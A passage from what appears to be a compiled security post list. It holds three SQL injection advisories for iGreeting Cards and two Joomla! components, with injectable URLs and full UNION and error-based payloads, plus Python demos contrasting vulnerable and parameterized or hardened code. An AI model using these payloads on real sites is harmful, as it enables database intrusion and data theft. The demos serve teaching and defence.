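        return "only .sql backups may be written"
    return None


def hardened_backup_argv(path, session_is_admin, defaults_file="/etc/a2billing/dump.cnf"):
    """argv for subprocess.run(argv) with shell=False: nothing in `path` is parsed by a
    shell, the dump lands outside the web root, and credentials come from a defaults
    file (assumed path) rather than the command line, where `ps` would show them."""
    reason = backup_rejection_reason(path, session_is_admin)
    if reason is not None:
        raise PermissionError(reason)
    target = BACKUP_DIR / os.path.basename(path)
    return ["mysqldump", f"--defaults-extra-file={defaults_file}",
            "--databases", DBNAME, f"--result-file={target}"]


if __name__ == "__main__":
    print(vulnerable_backup_command("0x4148.php"))
    print("executes as PHP:", served_as_php(vulnerable_backup_target("0x4148.php")))
    for candidate in ("0x4148.php", "../0x4148.sql", "nightly.sql"):
        print(candidate, "->", backup_rejection_reason(candidate, session_is_admin=True))
    print(hardened_backup_argv("nightly.sql", session_is_admin=True))
```

The extension check alone would not have been enough: the dump still carries whatever the SQL injection in step 2 placed in cc_payments_agent, so the hardened version also keeps the file out of the web root and behind the session check, and the INSERT itself should be parameterized.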
  23. Hacking

# # # # #
# Exploit Title: iGreeting Cards 1.0 - SQL Injection
# Dork: N/A
# Date: 04.09.2017
# Vendor Homepage: http://coryapp.com/
# Software Link: http://coryapp.com/?product&index
# Demo: http://coryapp.com/demo/greetingcards/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?index&search&k=[SQL]
#
# eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+-
#
# http://localhost/[PATH]/index.php?index&index&p=[SQL]
#
# http://localhost/[PATH]/index.php?category&index&id=[SQL]
#
# Etc..
# # # # #
24. # # # # #
# Exploit Title: Joomla! Component Survey Force Deluxe 3.2.4 - SQL Injection
# Dork: N/A
# Date: 03.09.2017
# Vendor Homepage: http://joomplace.com/
# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/survey-force-deluxe/
# Demo: http://demo30.joomplace.com/our-products/survey-force-deluxe
# Version: 3.2.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_surveyforce&task=start_invited&survey=19&invite=[SQL]
#
# Etc..
# # # # #
  25. Hacking

# # # # #
# Exploit Title: Joomla! Component CheckList 1.1.0 - SQL Injection
# Dork: N/A
# Date: 03.09.2017
# Vendor Homepage: http://joomplace.com/
# Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/
# Demo: http://checklistdemo.joomplace.com/
# Version: 1.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/[PROFILE][SQL].html
# http://localhost/[PATH]/[TAG][SQL].html
# http://localhost/[PATH]/[CHECKLIST][SQL].html
#
# our-products/checklist/checklist/tag/social'and+(SeLeCT+1+FrOM+(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast(database()+as+char),0x7e))+FrOM+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+FrOM+information_schema.tables+group+by+x)a)+AND+''='.html
#
# Etc..
# # # # #
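The three Ihsan Sencan advisories above, like the cc_payments_agent INSERT in the A2billing post, are each a query assembled by pasting a request parameter into the SQL text. The following is an added example, not the vendors' code: a SQLite stand-in for the iGreeting Cards search (post 23, `index.php?index&search&k=`) with `k` concatenated and then bound as a parameter, driven by the advisory's own UNION payload after URL decoding. The payload is ported from MySQL to SQLite: MySQL's `/*!11112UnIoN*/` version-comment trick and `VERSION()` have no SQLite equivalent, so a plain UNION and `sqlite_version()` stand in, with the column count reduced to match the stand-in table. The error-based `floor(rand(0)*2) ... group by x` payload in the CheckList advisory relies on MySQL's duplicate-key error and is not reproduced here. The table and its rows are constructed.

```python
import sqlite3
from urllib.parse import unquote_plus


def build_db():
    """Constructed sample data standing in for the application's card listing
    (assumption: the real schema is not on the page; three columns keep the UNION simple)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cards (id INTEGER, title TEXT, body TEXT)")
    db.executemany("INSERT INTO cards VALUES (?, ?, ?)", [
        (1, "Happy Birthday", "Many happy returns"),
        (2, "Get Well", "Feel better soon"),
    ])
    return db


def search_vulnerable(db, k):
    """The PoC shape: the `k` query-string value is pasted straight into the statement text,
    so a quote in `k` ends the string literal and the rest is parsed as SQL."""
    sql = f"SELECT id, title, body FROM cards WHERE title LIKE '%{k}%'"
    return db.execute(sql).fetchall()


def search_fixed(db, k):
    """Bound parameter: the engine receives the statement and the value separately, and
    the value can only ever be compared, never parsed."""
    sql = "SELECT id, title, body FROM cards WHERE title LIKE ?"
    return db.execute(sql, (f"%{k}%",)).fetchall()


# The payload as it would travel in the query string ('+' is a space), then decoded.
# (1) and (3) are marker columns, like the 0x283129 / 0x283329 hex literals in the advisory,
# so the injected row can be told apart from real results.
RAW_K = "eFe'+UNION+SELECT+'(1)',sqlite_version(),'(3)'--+-"
PAYLOAD = unquote_plus(RAW_K)


def leaked_version(rows):
    """Returns the value the injected SELECT placed in the second column, or None."""
    for row in rows:
        if row[0] == "(1)":
            return row[1]
    return None


if __name__ == "__main__":
    db = build_db()
    print("decoded payload :", PAYLOAD)
    print("vulnerable leaks:", leaked_version(search_vulnerable(db, PAYLOAD)))
    print("fixed leaks     :", leaked_version(search_fixed(db, PAYLOAD)))
    print("fixed, normal   :", search_fixed(db, "Birthday"))
```

The `-- -` tail comments out the `%'` the application appends, which is why the advisory's payload ends that way; with the bound parameter the same string simply becomes an unmatched LIKE pattern.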